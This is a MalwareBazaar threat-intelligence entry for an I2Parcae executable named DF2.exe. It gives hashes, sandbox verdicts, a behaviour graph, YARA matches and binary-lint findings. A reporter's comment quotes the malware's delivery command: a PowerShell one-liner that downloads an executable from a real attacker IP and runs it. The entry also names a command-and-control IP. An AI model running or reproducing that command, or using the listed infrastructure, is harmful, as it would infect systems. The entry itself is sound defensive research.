MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 7949f04cffb4daf9fa6c4774e2a9b18962c4f6157cd91f717e3089f49c9c754d. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



I2Parcae


Vendor detections: 12


Intelligence 12 IOCs YARA 17 File information Comments

SHA256 hash: 7949f04cffb4daf9fa6c4774e2a9b18962c4f6157cd91f717e3089f49c9c754d
SHA3-384 hash: a27997e9f6765207a5c5930f70feee8fe48bb17fb7c8fb9fd537e4779f6380668d3da34356833bdc5df0dca192994928
SHA1 hash: da86bea1b0de55fed13464a374e2f724ce38aee7
MD5 hash: 9b41d60958d07cdfd3cbc58fbb56cea7
humanhash: two-summer-missouri-asparagus
File name:DF2.exe
Download: download sample
Signature I2Parcae
File size:8'630'784 bytes
First seen:2025-01-01 17:08:16 UTC
Last seen:Never
File type:Executable exe
MIME type:application/x-dosexec
imphash 4b0c724426c4e106290c582a91355ce6 (1 x I2Parcae)
ssdeep 49152:9msYIP7Jzvi24hQ7UId5z3dxexnUSF4kPoJ8PnMX8Qodtd5yE+ghxR9scTQdZnK6:hZAIcTaKNeIo
TLSH T1D096293F62A5826DC25EC23EC0A3CF40D933B2761777C6E7629503A98F469C65E3E560
TrID 77.6% (.CPL) Windows Control Panel Item (generic) (57583/11/19)
14.1% (.EXE) Win64 Executable (generic) (10522/11/4)
2.7% (.EXE) OS/2 Executable (generic) (2029/13)
2.6% (.EXE) Generic Win/DOS Executable (2002/3)
2.6% (.EXE) DOS Executable Generic (2000/1)
Magika pebin
File icon (PE):PE icon
dhash icon bcf0e4d4d4dcd4d4 (99 x Vidar, 9 x CastleRAT, 7 x I2Parcae)
Reporter aachum
Tags:154-216-20-100 45-200-148-158 exe I2Parcae


Avatar
iamaachum
https://pc-softs.com/AutoDesk3DSMax/ => cmd /c start /min powershell $path='c:\users\public\DF2.exe';iwr http://154.216.20.100/tod/pr.py -outfile $path; start-process $path; start-process 'https://cutt.ly/ReXXzC1p'; => http://154.216.20.100/tod/pr.py

C2: 45.200.148.158

Intelligence


File Origin
# of uploads :
1
# of downloads :
547
Origin country :
ES ES
Vendor Threat Intelligence
Malware family:
n/a
ID:
1
File name:
154.216.20.100
Verdict:
Suspicious activity
Analysis date:
2025-01-01 17:04:18 UTC
Tags:
n/a

Note:
ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample
Verdict:
Malicious
Score:
94.9%
Tags:
cobalt shell sage remo
Result
Verdict:
Malware
Maliciousness:

Behaviour
Сreating synchronization primitives
Creating a window
Searching for synchronization primitives
Restart of the analyzed sample
Connecting to a non-recommended domain
Connection attempt
Sending a custom TCP request
Creating a file in the %temp% directory
Launching cmd.exe command interpreter
Searching for the window
Adding an exclusion to Microsoft Defender
Verdict:
Likely Malicious
Threat level:
  7.5/10
Confidence:
100%
Tags:
adaptive-context embarcadero_delphi fingerprint keylogger
Result
Threat name:
n/a
Detection:
malicious
Classification:
troj.evad
Score:
100 / 100
Signature
Adds a directory exclusion to Windows Defender
AI detected suspicious sample
Antivirus detection for dropped file
Antivirus detection for URL or domain
Connects to many ports of the same IP (likely port scanning)
Contains functionality to hide user accounts
Found Tor onion address
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Modifies Windows Defender protection settings
Multi AV Scanner detection for dropped file
NDIS Filter Driver detected (likely used to intercept and sniff network traffic)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious New Service Creation
Sigma detected: Suspicious Program Location with Network Connections
Behaviour
Behavior Graph:
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583067 Sample: DF2.exe Startdate: 01/01/2025 Architecture: WINDOWS Score: 100 81 reseed.i2pgit.org 2->81 83 reseed.diva.exchange 2->83 99 Antivirus detection for URL or domain 2->99 101 Multi AV Scanner detection for dropped file 2->101 103 NDIS Filter Driver detected (likely used to intercept and sniff network traffic) 2->103 105 8 other signatures 2->105 9 main.exe 2->9         started        14 DF2.exe 3 2->14         started        16 main.exe 2->16         started        18 2 other processes 2->18 signatures3 process4 dnsIp5 85 5.181.20.93 XTOMxTomEU Russian Federation 9->85 87 88.228.207.122 TTNETTR Turkey 9->87 95 24 other IPs or domains 9->95 67 C:\Windows\Temp\yGODxgsj, PE32+ 9->67 dropped 69 C:\Windows\Temp\bT51Gn7Q, PE32+ 9->69 dropped 71 C:\Windows\Temp\YERHbDgw, PE32+ 9->71 dropped 79 15 other files (13 malicious) 9->79 dropped 123 Multi AV Scanner detection for dropped file 9->123 125 Contains functionality to hide user accounts 9->125 127 Found Tor onion address 9->127 20 WerFault.exe 9->20         started        89 45.200.148.158, 1129, 49730 Africa-on-Cloud-ASZA Seychelles 14->89 73 C:\Users\...\w8m7wmyk939oczmkw4o2h16hs.exe, PE32+ 14->73 dropped 75 C:\Users\...\nju2apmx83wqd9u7namsf59y.exe, PE32+ 14->75 dropped 77 C:\...\4zy7r31p1gb90h9v8yoiitu76a64kr0m.bat, DOS 14->77 dropped 23 nju2apmx83wqd9u7namsf59y.exe 10 14->23         started        26 cmd.exe 1 14->26         started        28 w8m7wmyk939oczmkw4o2h16hs.exe 3 14->28         started        91 173.68.123.78 UUNETUS United States 16->91 93 78.58.99.133 TELIA-LIETUVALT Lithuania 16->93 97 30 other IPs or domains 16->97 30 WerFault.exe 18->30         started        file6 signatures7 process8 file9 63 C:\ProgramData\Microsoft\...\Report.wer, Unicode 20->63 dropped 65 C:\Users\Public\...\main.exe, PE32+ 23->65 dropped 109 Multi AV Scanner detection for dropped file 23->109 111 Contains functionality to hide user accounts 23->111 113 Machine Learning detection for dropped file 23->113 115 Found Tor onion address 23->115 32 taskkill.exe 1 23->32         started        34 sc.exe 1 23->34         started        36 sc.exe 23->36         started        47 4 other processes 23->47 117 Modifies Windows Defender protection settings 26->117 119 Adds a directory exclusion to Windows Defender 26->119 38 powershell.exe 23 26->38         started        41 powershell.exe 23 26->41         started        43 powershell.exe 20 26->43         started        45 conhost.exe 26->45         started        121 Antivirus detection for dropped file 28->121 signatures10 process11 signatures12 49 conhost.exe 32->49         started        51 conhost.exe 34->51         started        53 conhost.exe 36->53         started        107 Loading BitLocker PowerShell Module 38->107 55 conhost.exe 47->55         started        57 conhost.exe 47->57         started        59 conhost.exe 47->59         started        61 conhost.exe 47->61         started        process13
Verdict:
malicious
Label(s):
i2parcae
Similar samples:
Result
Malware family:
n/a
Score:
  10/10
Tags:
execution
Behaviour
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Executes dropped EXE
Command and Scripting Interpreter: PowerShell
Suspicious use of NtCreateUserProcessOtherParentProcess
Unpacked files
SH256 hash:
7949f04cffb4daf9fa6c4774e2a9b18962c4f6157cd91f717e3089f49c9c754d
MD5 hash:
9b41d60958d07cdfd3cbc58fbb56cea7
SHA1 hash:
da86bea1b0de55fed13464a374e2f724ce38aee7
Please note that we are no longer able to provide a coverage score for Virus Total.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:Borland
Author:malware-lu
Rule name:cobalt_strike_tmp01925d3f
Author:The DFIR Report
Description:files - file ~tmp01925d3f.exe
Reference:https://thedfirreport.com
Rule name:crime_unidentified_118
Author:kevoreilly
Description:Detects malware family unidentified_118
Rule name:crime_unidentified_118_packed
Author:Rony (r0ny_123)
Description:Detects packed samples of malware family unidentified_118
Rule name:DebuggerCheck__API
Reference:https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
Rule name:golang_bin_JCorn_CSC846
Author:Justin Cornwell
Description:CSC-846 Golang detection ruleset
Rule name:golang_david_CSC846
Author:David
Description:CSC-846 Golang
Rule name:pe_detect_tls_callbacks
Rule name:RansomPyShield_Antiransomware
Author:XiAnzheng
Description:Check for Suspicious String and Import combination that Ransomware mostly abuse(can create FP)
Rule name:Sus_Obf_Enc_Spoof_Hide_PE
Author:XiAnzheng
Description:Check for Overlay, Obfuscating, Encrypting, Spoofing, Hiding, or Entropy Technique(can create FP)
Rule name:XWorm_3_0_3_1_Detection
Author:Archevod
Description:Detects XWorm versions 3.0 and 3.1

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Web download

I2Parcae

Executable exe 7949f04cffb4daf9fa6c4774e2a9b18962c4f6157cd91f717e3089f49c9c754d

(this sample)

  
Delivery method
Distributed via web download

BLint


The following table provides more information about this file using BLint. BLint is a Binary Linter to check the security properties, and capabilities in executables.

Findings
IDTitleSeverity
CHECK_AUTHENTICODEMissing Authenticodehigh
CHECK_NXMissing Non-Executable Memory Protectioncritical
CHECK_PIEMissing Position-Independent Executable (PIE) Protectionhigh
Reviews
IDCapabilitiesEvidence
COM_BASE_APICan Download & Execute componentsole32.dll::CoCreateInstance
MULTIMEDIA_APICan Play Multimediagdi32.dll::StretchDIBits
WIN32_PROCESS_APICan Create Process and Threadskernel32.dll::CloseHandle
winhttp.dll::WinHttpCloseHandle
kernel32.dll::CreateThread
WIN_BASE_APIUses Win Base APIkernel32.dll::LoadLibraryExW
kernel32.dll::LoadLibraryA
kernel32.dll::LoadLibraryW
kernel32.dll::GetSystemInfo
kernel32.dll::GetStartupInfoW
kernel32.dll::GetDiskFreeSpaceW
WIN_BASE_IO_APICan Create Fileskernel32.dll::CreateFileW
kernel32.dll::DeleteFileW
kernel32.dll::GetWindowsDirectoryW
kernel32.dll::GetFileAttributesW
kernel32.dll::FindFirstFileW
kernel32.dll::RemoveDirectoryW
WIN_HTTP_APIUses HTTP serviceswinhttp.dll::WinHttpAddRequestHeaders
winhttp.dll::WinHttpConnect
winhttp.dll::WinHttpCrackUrl
winhttp.dll::WinHttpOpenRequest
winhttp.dll::WinHttpOpen
winhttp.dll::WinHttpQueryAuthSchemes
WIN_REG_APICan Manipulate Windows Registryadvapi32.dll::RegConnectRegistryW
advapi32.dll::RegCreateKeyExW
advapi32.dll::RegDeleteKeyW
advapi32.dll::RegLoadKeyW
advapi32.dll::RegOpenKeyExW
advapi32.dll::RegQueryInfoKeyW
WIN_USER_APIPerforms GUI Actionsuser32.dll::ActivateKeyboardLayout
user32.dll::CreateMenu
user32.dll::EmptyClipboard
user32.dll::FindWindowExW
user32.dll::FindWindowW
user32.dll::OpenClipboard

Comments